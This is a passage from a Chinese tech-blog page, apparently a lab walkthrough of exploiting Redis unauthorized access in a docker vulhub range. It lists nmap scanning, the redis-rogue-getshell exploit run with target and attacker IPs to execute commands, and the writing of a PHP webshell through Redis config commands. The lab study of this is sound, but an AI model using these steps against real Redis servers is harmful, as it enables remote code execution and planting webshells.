| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> Redis未授权访问漏洞 -> 正文阅读 |
|
[PHP知识库]Redis未授权访问漏洞 |
靶场环境:redis:4.0.14 docker搭建靶场环境 docker-compose up -d docker-compose ps 未授权访问远程连接 攻击机安装redis,依次执行以下命令 wget http://download.redis.io/releases/redis-2.8.12.tar.gz tar -xzf redis-2.8.12.tar.gz cd redis-2.8.12 make cd src ./redis-cli -h nmap扫描靶机 nmap -sV --open -p- 192.168.238.156 发现6379、111、80、22端口开启 用攻击机redis连接目标机redis cd redis-2.8.12/src/ ./redis-cli -h 192.168.238.156 使用现有exp实现远程代码执行 克隆exp项目文档 git clone https://github.com/vulhub/redis-rogue-getshell.git 进入该目录下 cd redis-rogue-getshell/RedisModulesSDK/exp 在当前目录下生成一个exp.so文件 make 回到redis-rogue-getshell目录下,利用EXP ./redis-master.py -r 192.168.111.137 -p 6379 -L 192.168.111.139 -P 1111 -f RedisModulesSDK/exp/exp.so -c "id"? //第一个ip是靶机,第二个ip是攻击机 写入webshell 指定工作目录 设置数据库文件名 config set dbfilename tyc.php 追加写入tyc.php文件内容 set trojan "<?php phpinfo();?>" 保存 save??? ?将vulhub.zip压缩包复制到靶机中 解压vulhub.zip文件 unzip vulhub.zip 进去对应目录启动容器 安装apache与php sudo apt install php libapache2-mod-php |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/26 16:37:28- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |